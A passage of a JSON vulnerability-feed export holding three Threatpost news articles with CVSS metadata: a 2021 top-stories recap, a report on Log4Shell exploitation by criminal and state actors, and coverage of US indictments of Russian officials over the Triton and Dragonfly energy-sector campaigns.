Alex Birsan, who found that it\u2019s possible to [inject malicious code](<https://threatpost.com/supply-chain-hack-paypal-microsoft-apple/163814/>) into common tools for installing dependencies in developer projects. Such projects typically use public repositories from sites like GitHub. The malicious code then can use these dependencies to propagate malware through a targeted company\u2019s internal applications and systems. The novel supply-chain attack was (ethically) used to breached the systems of more than 35 technology players, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla and Uber, by exploiting public, open-source developer tools.\n * In June, a group of cryptominers was found [to have infiltrated](<https://threatpost.com/cryptominers-python-supply-chain/167135/>) the PyPI. Researchers found six different malicious packages hiding there, which had a collective 5,000 downloads.\n * In July, a credentials-stealing package that uses legitimate password-recovery tools in Google\u2019s Chrome web browser [was found lurking in ](<https://threatpost.com/npm-package-steals-chrome-passwords/168004/>)npm. Researchers caught the malware filching credentials from Chrome on Windows systems. The password-stealer is multifunctional: It also listens for incoming commands from the attacker\u2019s command-and-control (C2) server and can upload files, record from a victim\u2019s screen and camera, and execute shell commands.\n\n## **4\\. Interesting Ransomware Variants**\n\nThe ransomware epidemic matured in 2021, with the actual malware used to lock up files progressing beyond simply slapping an extension on targeted folders. Readers flocked to malware analysis stories covering advancements in ransomware strains, including the following Top 3 discoveries.\n\n### **HelloKitty\u2019s Linux Variant Targets VMs**\n\nIn June, for the first time, researchers [publicly spotted](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>) a Linux encryptor \u2013 being used by the HelloKitty ransomware gang.\n\nHelloKitty, the same group behind the [February attack](<https://threatpost.com/cyberpunk-2077-publisher-hack-ransomware/163775/>) on videogame developer CD Projekt Red, has developed numerous Linux ELF-64 versions of its ransomware, which it used to target VMware ESXi servers and virtual machines (VMs) running on them.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/16162559/hellokitty-e1626467172148.jpeg>)\n\nVMware ESXi, formerly known as ESX, is a bare-metal hypervisor that installs easily onto servers and partitions them into multiple VMs. While that makes it easy for multiple VMs to share the same hard-drive storage, it sets systems up to be one-stop shopping spots for attacks, since attackers can encrypt the centralized virtual hard drives used to store data from across VMs.\n\nDirk Schrader of New Net Technologies (NNT) told Threatpost that on top of the attraction of ESXi servers as a target, \u201cgoing that extra mile to add Linux as the origin of many virtualization platforms to [malware\u2019s] functionality\u201d has the welcome side effect of enabling attacks on any Linux machine.\n\n### **MosesStaff: No Decryption Available**\n\nA politically motivated group known as MosesStaff [was seen in November](<https://threatpost.com/mosesstaff-locks-targets-ransom-decryption/176366/>) paralyzing Israeli entities with no financial goal \u2013 and no intention of handing over decryption keys. Instead, it was using ransomware in politically motivated, destructive attacks at Israeli targets, looking to inflict the most damage possible.\n\nMosesStaff encrypts networks and steals information, with no intention of demanding a ransom or rectifying the damage. The group also maintains an active social-media presence, pushing provocative messages and videos across its channels, and making its intentions known.\n\n### **Epsilon Red Targets Exchange Servers**\n\nThreat actors in June [were seen deploying](<https://threatpost.com/exchange-servers-epsilon-red-ransomware/166640/>) new ransomware on the back of a set of PowerShell scripts developed for exploiting flaws in unpatched Exchange Servers.\n\nThe Epsilon Red ransomware \u2013 a reference to an obscure enemy character in the X-Men Marvel comics, a super soldier of Russian origin armed with four mechanical tentacles \u2013 was discovered after an attack on a U.S.-based company in the hospitality sector.\n\nResearchers said the ransomware was different in the way it spreads its hooks into a corporate network. While the malware itself is a \u201cbare-bones\u201d 64-bit Windows executable programmed in the Go programming language, its delivery system relies on a series of PowerShell scripts that \u201cprepared the attacked machines for the final ransomware payload and ultimately delivered and initiated it,\u201d they wrote.\n\n## **5\\. Gaming Security**\n\nFor the second year in a row, gaming security was on the radar for readers in 2021, possibly because cybercriminals continue to target this area as result of the global COVID-19 pandemic driving higher volumes of play. In a recent survey by Kaspersky, nearly 61 percent reported suffering foul play such as ID theft, scams or the hack of in-game valuables. Some of the most popular articles are recapped below.\n\n### **Steam Used to Host Malware**\n\nIn June, the appropriately named SteamHide malware [emerged](<https://threatpost.com/steam-gaming-delivering-malware/166784/>), which disguises itself inside profile images on the gaming platform Steam.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/01084854/Steam-logo.jpg>)\n\nThe Steam platform merely serves as a vehicle which hosts the malicious file, according to research from G Data: \u201cThe heavy lifting in the shape of downloading, unpacking and executing a malicious payload fetched by the loader is handled by an external component, which accesses the malicious profile image on one Steam profile. This external payload can be distributed via crafted emails to compromised websites.\u201d\n\nThe steganography technique is obviously not new \u2014 but Steam profiles being used as attacker-controlled hosting sites, is \u2013 and readers\u2019 ears perked up in a big way when we posted the story.\n\n### **Twitch Source-Code Leak**\n\nIn October, an anonymous user posted a link to a 125GB torrent on 4chan, containing all of Twitch\u2019s source code, comments going back to its inception, user-payout information and more.\n\nThe attacker [claimed to have ransacked](<https://threatpost.com/twitch-source-code-leaked/175359/>) the live gameplay-streaming platform for everything it\u2019s got; Twitch confirmed the breach not long after.\n\nThe threat actor rationalized gutting the service by saying that the Twitch community needs to have the wind knocked out of its lungs. They called the leak a means to \u201cfoster more disruption and competition in the online-video streaming space,\u201d because \u201ctheir community is a disgusting toxic cesspool.\u201d\n\n### **Steam-Stealing Discord Scams**\n\nIn November, a scam started making the rounds on Discord, through which cybercriminals could harvest Steam account information and make off with any value the account contained.\n\nGamer-aimed Discord scams are just about everywhere. But researchers [flagged a new approach](<https://threatpost.com/free-discord-nitro-offer-steam-credentials/176011/>) as noteworthy because it crossed over between Discord and the Stream gaming platform, with crooks offering a purported free subscription to Nitro (a Discord add-on that enables avatars, custom emoji, profile badges, bigger uploads, server boosts and so on), in exchange for \u201clinking\u201d the two accounts.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/04113440/nitro-fake-discord-website-600x324-1.png>)\n\nThe target is first served a malicious direct message on Discord with the fake offer. \u201cJust link your Steam account and enjoy,\u201d the message said, which included a link to purportedly do just that. The malicious link takes users to a spoofed Discord page with a button that reads, \u201cGet Nitro.\u201d Once a victim clicks on the button, the site appears to serve a Steam pop-up ad, but researchers explained the ad is still part of the same malicious site.\n\nThe gambit is intended to fool users into thinking they\u2019re being taken to the Steam platform to enter in their login information \u2014 in reality, the crooks are poised to harvest the credentials.\n\n### **Sony PlayStation3 Bans**\n\nIn June, a reported breach of a Sony folder containing the serial ID numbers for every PlayStation3 console out there [appeared to](<https://threatpost.com/ps3-players-ban-attacks-gaming/167303/>) have led to users being inexplicably banned from the platform.\n\nSony reportedly left a folder with every PS3 console ID online unsecured, and it was discovered and reported by a Spanish YouTuber with the handle \u201cThe WizWiki\u201d in mid-April. In June, players on PlayStation Network message boards began complaining that they couldn\u2019t sign on.\n\nUsers mused that threat actors started using the stolen PS3 console IDs for malicious purposes, causing the legitimate players to get banned. But Sony didn\u2019t confirm a connection between the PS3 ID breach and player reports of being locked out of the platform.\n\n## **Bonus Item: Zodiac Killer Cipher \u2013 Revealed!!**\n\nOne of the quirky stories that made it into the Top 10 most-read Threatpost stories for 2021 concerned the cracking of the Zodiac\u2019s serial killer\u2019s 340 cipher, which couldn\u2019t be solved for 50 years. \nIn December 2020, the code [was cracked](<https://threatpost.com/cryptologists-zodiac-killer-340-cipher/162353/>) by a team of mathematicians.\n\nThe Zodiac serial killer is believed to have murdered at least five people \u2014 and likely more \u2014 in and around the Northern California area in the late 1960s and early 1970s. The still-unnamed murderer sent a series of four coded messages to local newspaper outlets, bragging about his crimes and containing cryptic icons, which earned him the moniker \u201cZodiac.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/17122725/Zodiac-e1608226062664.jpg>)\n\nThe first cipher was quickly decoded. But the second, the 340 Cipher, named after its 340 characters, was trickier to figure out. Australian-based mathematician Sam Blake calculated that there were 650,000 possible ways to read the code, and Jarl Van Eycke, whose day job is as a warehouse operator in Belgium, wrote a code-breaking software to tackle decryption. Soon, their unique algorithmic approach paid off. The message, officially recognized by the FBI as correct, reads:\n\n\u201cI HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH.\u201d\n\nWhile the name of the elusive serial killer remains hidden, the breakthrough represents a triumph for cryptology and the basic building blocks of cybersecurity \u2014 access control and segmentation.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T18:57:24", "type": "threatpost", "title": "The 5 Most-Wanted Threatpost Stories of 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T18:57:24", "id": "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "href": "https://threatpost.com/5-top-threatpost-stories-2021/177278/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T04:10:46", "description": "Call it a \u201clogjam\u201d of threats: Attackers including nation-state actors have already targeted half of all corporate global networks in security companies\u2019 telemetry using at least 70 distinct malware families \u2014 and the fallout from the Log4j vulnerability is just beginning.\n\nResearchers manning keyboards all over the world have spent the past several days chasing [attacks aimed at a now-infamous Log4j](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) Java library bug, dubbed [Log4Shell (CVE-2021-44228).](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) Side note: Log4j is pronounced, \u201clog forge\u201d \u2014 although that\u2019s disputed, because it\u2019s also referred to in conversation as \u201clog-four-jay.\u201d Dealer\u2019s choice there.\n\nFirst discovered among Minecraft players last week, the newly discovered vulnerability has opened a massive opportunity for threat actors to hijack servers, mostly with coin miners and botnets, but also a cornucopia of other malware such as the [StealthLoader trojan](<https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/>) \u2014 and that\u2019s just so far.\n\n\u201cWe\u2019ve seen a lot of chatter on Dark Web forums, including sharing scanners, bypasses and exploits,\u201d Erick Galinkin, an artificial intelligence researcher at Rapid7, told Threatpost. \u201cAt this point, more than 70 distinct malware families have been identified by us and other security researchers.\u201d\n\nFor instance, Bitdefender researchers this week [discovered](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>) that threat actors are attempting to exploit Log4Shell to deliver a new ransomware called Khonsari to Windows machines.\n\nCheck Point research reported Wednesday that since last Friday, its team has detected 1.8 million Log4j [exploit attempts](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on almost half of all corporate networks that they track.\n\nThese threat actors aren\u2019t low-skilled hobbyists. Check Point added that as of Wednesday, Iranian hacking group Charming Kitten, also known as APT 35 and widely believed to be working as a [nation-state actor](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>), is actively targeting seven specific Israeli organizations across the government and business sectors.\n\n\u201cOur reports of the last 48 hours prove that both criminal-hacking groups and nation state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors\u2019 operations are to be revealed in the coming days,\u201d Check Point added.\n\nMicrosoft meanwhile reported that nation-state groups Phosphorus (Iran) and [Hafnium](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) (China), as well as unnamed APTs from North Korea and Turkey are actively exploiting Log4Shell (CVE-2021-44228) in targeted attacks. Hafnium is known for targeting Exchange servers with the ProxyLogon zero-days back in March, while Phosphorus [made headlines](<https://threatpost.com/microsoft-iranian-apt-t20-summit-munich-security-conference/160654/>) for targeting global summits and conferences in 2020.\n\n\u201cThis activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment and exploitation against targets to achieve the actor\u2019s objectives,\u201d the company said in [a posting](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>).\n\n## **Is a Log4j Worm Next? **\n\nResearcher Greg Linares meanwhile has reported seeing evidence that a self-propagating worm is being developed and will likely emerge in a day or less.\n\n> [#Log4J](<https://twitter.com/hashtag/Log4J?src=hash&ref_src=twsrc%5Etfw>) based on what I've seen, there is evidence that a worm will be developed for this in the next 24 to 48 hours.\n> \n> Self propagating with the ability to stand up a self hosted server on compromised endpoints.\n> \n> In addition to spraying traffic, dropping files, it will have c2c\n> \n> \u2014 Greg Linares (@Laughing_Mantis) [December 12, 2021](<https://twitter.com/Laughing_Mantis/status/1470165580736987137?ref_src=twsrc%5Etfw>)\n\nThere is wide agreement within the cybersecurity community that he\u2019s correct, but many experts don\u2019t think the fallout will be as bad with Log4j as it was with past incidents like [WannaCry or NotPetya](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>).\n\n\u201cWhile it\u2019s possible that we could see a worm developed to spread among susceptible Log4j devices, there hasn\u2019t been any evidence to suggest this is a priority for threat actors at this time,\u201d Chris Morgan, senior cyber threat intelligence analyst at Digital Shadows, told Threatpost. \u201cDeveloping malware of this nature takes a significant amount of time and effort.\u201d\n\n\u201cThis activity differs from the WannaCry incident, which saw a perfect storm of a highly exploitable vulnerability coinciding with an NSA-level exploit breach in EternalBlue,\u201d Morgan added.\n\n\u201cIt\u2019s still very much early days with regards to Log4j,\u201d Morgan said. \u201cWhile many threat actors will likely be at different stages of the kill chain, most actors will likely still be scanning for susceptible systems, attempting to establish a foothold, and identifying further opportunities, depending on their motivations. Efforts among actors at this stage are rushing to exploit before companies have a chance to patch, rather than spending time developing a worm.\u201d\n\nThe emergence of a Log4j worm isn\u2019t the worst-case scenario, researchers like Yaniv Balmas from Salt Security explained to Threatpost.\n\n\u201cWhile not neglecting the impact of such a worm, that might not be the worst scenario because of the unbelievable easiness that this attack can be applied,\u201d Balmas said. \u201cEveryone with a basic computer and internet access could launch an attack against millions of online services within minutes. This achieves quite a similar impact as a worm \u2013 it is distributed and unpredictable, and the damage extent might even be higher than a worm since a worm works \u2018blindly\u2019 in an automated manner.\u201d\n\nHe added, \u201cin this other scenario, there are actual humans behind the attacks which may target specific entities or institutions and enable attackers to fine-tune their attacks as they progress.\u201d\n\nThe tireless work being done by security teams to [patch up Log4j against exploits](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) is a big help against the development of any worms on the horizon, John Bambenek, principal threat hunter at Netenrich, told Threatpost.\n\n\u201cThis vulnerability certainly looks wormable, however, the good news is we\u2019ve already had almost a week to start dealing with detection, mitigation [and patching](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>),\u201dBambenek said. \u201cThere will be lots of vulnerable machines out there, but by now a good deal of the vulnerable machines have been handled and many more are protected with web application firewall (WAF) rules (for instance, Cloudflare deployed protection over the weekend). The worst case would have been a worm last week, we\u2019re in a better place now.\u201d\n\n## **Log4j\u2019s Long Tail **\n\nBeyond emergency patching measures, Galinkin explained to Threatpost that his concern is with lingering unpatched devices and systems that will be vulnerable long after Log4j has fallen out of the headlines, particularly in sectors like academia and healthcare.\n\n\u201cOne crucial thing to note about this vulnerability is that it\u2019s going to have an extremely long tail,\u201d he said. \u201cHospitals tend to purchase software once, but sometimes the vendors become defunct \u2014 leading to unsupported software that will never receive a patch.\u201d\n\nHe added, \u201cin academia, loads of software is written once by grad students or professors, but those individuals may not be aware of the bug, or they simply no longer maintain the software \u2014 software that is in use in physics, pharmacology and bioinformatics. This suggests that we will continue to see exploitation of this vulnerability \u2014 potentially in isolated incidents \u2014 long into the future.\u201d\n\n121621 16:21 UPDATE: Corrected spelling of John Bambenek\u2019s name.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T23:18:44", "type": "threatpost", "title": "Relentless Log4j Attacks Include State Actors, Possible Worm", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T23:18:44", "id": "THREATPOST:5CCE0C2607242B16B2880B331167526C", "href": "https://threatpost.com/log4j-attacks-state-actors-worm/177088/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T23:16:23", "description": "The U.S. Department of Justice (DOJ) has [indicted](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>) four Russian government employees in connection to plots to cyber-fry critical infrastructure in the United States and beyond, including at least one nuclear power plant.\n\nThe campaigns involved one of the most dangerous malwares ever encountered in the operational technology and energy sectors: Triton, aka Trisis, a Russia-linked malware used to shut down an oil refinery in 2017 and [another Mideast target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) in 2019.\n\nTwo related indictments were unsealed yesterday: one that named Evgeny Viktorovich Gladkikh ([PDF](<https://www.justice.gov/opa/press-release/file/1486831/download>)), an employee of the Russian Ministry of Defense, and another ([PDF](<https://www.justice.gov/opa/press-release/file/1486836/download>)) that named three officers in Military Unit 71330 \u2013 or \u201cCenter 16\u201d \u2013 of Russia\u2019s Federal Security Service (FSB), which is the successor to Russia\u2019s KGB.\n\nCenter 16 is the FSB\u2019s main structural unit for signals intelligence, consisting of a central unit housed in unmarked administrative buildings spread across Moscow and secluded forest enclosures, with massive satellite dishes pointing out to listen to the world. It\u2019s known by cybersecurity researchers as \u201cDragonfly,\u201d \u201cEnergetic Bear\u201d and \u201cCrouching Yeti.\u201d\n\n## $10M Reward for Intel on FSB Officers\n\nThere\u2019s a reward on the heads of the trio of FSB officers for allegedly hacking a refinery. The State Department [said](<https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-fsb-officers-conducting-malicious-activity-against-u-s-critical-infrastructure-between-2012-2017/>) on Thursday that its Rewards for Justice (RFJ) program is offering $10 million for information on the three, whose names are Pavel Aleksandrovich Akulov, Mikhail Mikhailovich Gavrilov and Marat Valeryevich Tyukov.\n\nThe officers were allegedly involved in computer intrusions, wire fraud, aggravated identity theft and damage to an energy facility. The reward marks the first time that RFJ has named a foreign government security personnel under its critical infrastructure reward offer, the State Department said.\n\n## Triton/Trisis\n\nTriton was allegedly used in campaigns run between May and September 2017.\n\nResearchers have compared Triton\u2019s targeting of industrial control systems (ICS) to malware used in the watershed attacks [Stuxnet](<https://threatpost.com/stuxnets-first-five-victims-provided-path-to-natanz/109291/>) and Industroyer/Crashoverride, the latter of which is a backdoor that targets ICS and which took down the Ukrainian power grid in Kiev in 2016. In 2018, research revealed that Industroyer [was linked](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) to the massive [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) ransomware outbreak that crippled organizations around the world the year before.\n\nAccording to the indictment, between May and September 2017, Gladkikh, a 36-year-old computer programmer employed by an institute affiliated with the Russian Ministry of Defense, was involved in a campaign to hack global energy facilities \u201cusing techniques designed to enable future physical damage with potentially catastrophic effects.\u201d The hacking allegedly led to two separate emergency shutdowns at a foreign facility.\n\nAlong with co-conspirators, Gladkikh allegedly hacked the systems of \u201ca foreign refinery\u201d (presumably Saudi oil giant Petro Rabigh) in 2017 and installed Triton/Trisis malware on a safety system produced by Schneider Electric. Triton actually takes its name from the fact that it\u2019s designed to target Triconex safety instrumented system (SIS) controllers, which are sold by Schneider Electric. Triton surfaced again in 2019, when it was again [used to target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) an undisclosed company in the Middle East.\n\nTriton was designed to prevent the refinery\u2019s safety systems from functioning \u2013 \u201cby causing the ICS to operate in an unsafe manner while appearing to be operating normally,\u201d the DOJ said \u2013 thereby leaving the refinery open to damage and jeopardizing anybody nearby.\n\n\u201cWhen the defendant deployed the Triton malware, it caused a fault that led the refinery\u2019s Schneider Electric safety systems to initiate two automatic emergency shutdowns of the refinery\u2019s operations,\u201d the DOJ said. Between February and July 2018, Gladkikh and his crew allegedly researched and (unsuccessfully) tried to hack the computer systems used by a U.S. company with similar refineries.\n\nAs energy news outlet E&amp;E News [reported](<https://www.eenews.net/articles/the-inside-story-of-the-worlds-most-dangerous-malware/>) in 2019, in the early evening of Aug. 4, 2017, two emergency shutdown systems sprang to life at Petro Rabigh\u2019s sprawling refinery along Saudi Arbia\u2019s Red Sea coast. Engineers working the weekend shift were oblivious, even as the systems knocked the complex offline \u201cin a last-gasp effort to prevent a gas release and deadly explosion.\u201d\n\n\u201c[They] spotted nothing out of the ordinary, either on their computer screens or out on the plant floor,\u201d according to E&amp;E News.\n\nGladkikh has been charged with three counts: conspiracy to cause damage to an energy facility, attempt to damage an energy facility, and one count of conspiracy to commit computer fraud.\n\n## FSB Officers\u2019 Indictment: The Dragonfly Supply-Chain Attack\n\nThe indictment that names the FSB officers alleges that, between 2012 and 2017, Akulov, Gavrilov, Tyukov and their co-conspirators engaged in computer intrusions, including supply chain attacks, \u201cin furtherance of the Russian government\u2019s efforts to maintain surreptitious, unauthorized and persistent access to the computer networks of companies and organizations in the international energy sector, including oil and gas firms, nuclear power plants, and utility and power transmission companies.\u201d\n\nSpecifically, they allegedly targeted the software and hardware that controls equipment in power generation facilities, known as ICS or Supervisory Control and Data Acquisition (SCADA) systems.\n\n\u201cAccess to such systems would have provided the Russian government the ability to, among other things, disrupt and damage such computer systems at a future time of its choosing,\u201d according to the DOJ\u2019s [press release](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>).\n\nThe indictment describes a campaign against the energy sector that involved two phases: The first was a supply-chain attack that was commonly referred to as \u201cDragonfly\u201d or \u201cHavex\u201d by security researchers. Dragonfly took place between 2012 and 2014 and compromised computer networks of ICS/SCADA system manufacturers and software vendors.\n\nIt involved tucking the Havex remote-access trojan (RAT) [inside legitimate software updates](<https://threatpost.com/ics-malware-found-on-vendors-update-installers/106910/>). According to a 2014 advisory from the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the Havex RAT targeted vendors via phishing campaigns, website redirects and, finally, by infecting the software installers. Three vendor websites were compromised in watering-hole attacks, the ICS-CERT advisory said.\n\n\u201cAfter unsuspecting customers downloaded Havex-infected updates, the conspirators would use the malware to, among other things, create backdoors into infected systems and scan victims\u2019 networks for additional ICS/SCADA devices,\u201d according to the DOJ. The gang allegedly managed to install malware on more than 17,000 unique devices in the United States and abroad, including ICS/SCADA controllers used by power and energy companies.\n\n## Dragonfly 2.0: Spearphishing a Nuclear Power Plant\n\nBetween 2014 and 2017, the campaign entered into what\u2019s commonly referred to as \u201cDragonfly 2.0,\u201d wherein the suspects allegedly turned their focus to specific energy sector entities and individuals and engineers who worked with ICS/SCADA systems.\n\nThis second phase entailed spearphishing attacks targeting more than 3,300 users at more than 500 U.S. and international companies and entities, in addition to U.S. government agencies such as the Nuclear Regulatory Commission.\n\nThe spearphishing attacks sometimes struck gold, including in the compromise of the business network (i.e., involving computers not directly connected to ICS/SCADA equipment) of the Wolf Creek Nuclear Operating Corporation (Wolf Creek) in Burlington, Kansas. Wolf Creek operates a nuclear power plant.\n\n\u201cMoreover, after establishing an illegal foothold in a particular network, the conspirators typically used that foothold to penetrate further into the network by obtaining access to other computers and networks at the victim entity,\u201d according to the DOJ.\n\nDragonfly 2.0 also entailed a watering-hole attack wherein the alleged attackers exploited publicly known vulnerabilities in [content management software ](<https://threatpost.com/threatlist-wordpress-vulnerabilities/140690/>)(CMS) to compromise servers that hosted websites commonly visited by ICS/SCADA system and other energy sector engineers. \u201cWhen the engineers browsed to a compromised website, the conspirators\u2019 hidden scripts deployed malware designed to capture login credentials onto their computers,\u201d the DOJ said.\n\nThe campaign targeted victims in the United States and in more than 135 other countries, the Feds said.\n\nThe FSB officers are looking at charges of conspiracy to cause damage to the property of an energy facility and commit computer fraud and abuse and conspiracy to commit wire fraud. Akulov and Gavrilov are also charged with substantive counts of wire fraud and computer fraud related to unlawfully obtaining information from computers and causing damage to computers. Akulov and Gavrilov are also charged with three counts of aggravated identity theft.\n\n## Still Gaping Security Holes in Energy Companies\n\nLookingGlass CEO Gilman Louie, an expert on national security and cybersecurity who regularly shares or analyzes intel with government agencies, told Threatpost on Friday that legal actions against the potential operators of the critically dangerous Triton malware are welcome: They\u2019re a \u201cpositive move [that] sends a strong message to cybercrime and nation-state actors globally,\u201d he said via email.\n\nOn the less-positive side, a recent LookingGlass cyber profile of the U.S. Energy sector looks grim.\n\nMany energy companies are sitting ducks, with current cybersecurity exposures that have already been exploited by Russian actors in the past, including open ports that enable threat actors to gain full remote access.\n\nThe report shares vulnerabilities and exposures that Russian hackers are known to have used. \u201cFor years, energy companies have been hammered on securing their operational technology. The Triton attacks show why this is important,\u201d Louie noted.\n\nBut he stated that \u201corganizations also need to ensure they\u2019re improving security on their traditional IT side.\u201d He pointed to the Colonial Pipeline attack as an example of how adversaries \u201cdidn\u2019t need in-depth knowledge of [operational technology, or OT] to shut down the flow of gas or oil.\u201d \n\nLookingGlass research shows that, across the energy sector, there are vulnerabilities that are more than 5 years old that haven\u2019t been dealt with, and open ports like remote desktop that are \u201cbasically unprotected doors into an organization.\u201d\n\nEnergy companies need to be patching or updating their systems, Louie said and shutting those open doors: \u201cIf they really need a port open for remote desktop, then they need to add layers of compensating security controls to make sure it\u2019s not easy to exploit.\u201d\n\nWhen unsealing the indictments, the government noted that it\u2019s taking action to [enhance private sector network defense efforts](<https://www.cisa.gov/uscert/ncas/alerts/aa22-083a>) and to [disrupt similar malicious activity](<https://protect2.fireeye.com/v1/url?k=73f0be82-2c6b867e-73f79a67-ac1f6b01771c-a72e8f7b8ceb667b&q=1&e=d2252912-db07-4b30-8381-4dbd442acfc0&u=https%3A%2F%2Frewardsforjustice.net%2Findex%2F%3Fjsf%3Djet-engine%3Arewards-grid%26tax%3Dcyber%3A857>).\n\nOther security issues that Russian actors have leveraged, which companies need to address immediately before they are used for attacks that could be bigger than those we\u2019ve already seen, include:\n\n * **Default Passwords**: Exactly what it sounds like. Default passwords are a major attack vector. Not changing default passwords, especially with a tool like Telnet, leaves companies wide open to Russian access to networks.\n * [**Port 161 \u2013 SNMP protocol**](<https://www.cisa.gov/uscert/ncas/alerts/TA18-106A>): The Simple Network Management Protocol (SNMP) uses both port 161 and port 162 for sending commands and messages and is being used by Russia to gain access to network devices and infrastructure. Older versions of this protocol are unsecure and allow threat actors to eavesdrop or manipulate data.\n * **Port 139/445 \u2013 SMB: **The SMB network port is commonly used for file sharing. Russian groups have successfully targeted this port to execute remote code and to steal information, LookingGlass found.\n\nThese are just a few examples of security exposures that threat actors tied directly to Russia have exploited and will likely exploit again within U.S. companies, according to LookingGlass\u2019s research.\n\nIt\u2019s not time to wait for a nuclear-level cyber event, given that threat actors are already inside the power infrastructure. Now\u2019s the time for companies to find and mitigate the holes that let them in, Louie said.\n\n\u201cEnergy sector entities should be reviewing their digital footprint and taking action to secure their external-facing assets, especially as the threat of Russian cyberattacks intensifies,\u201d he said.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 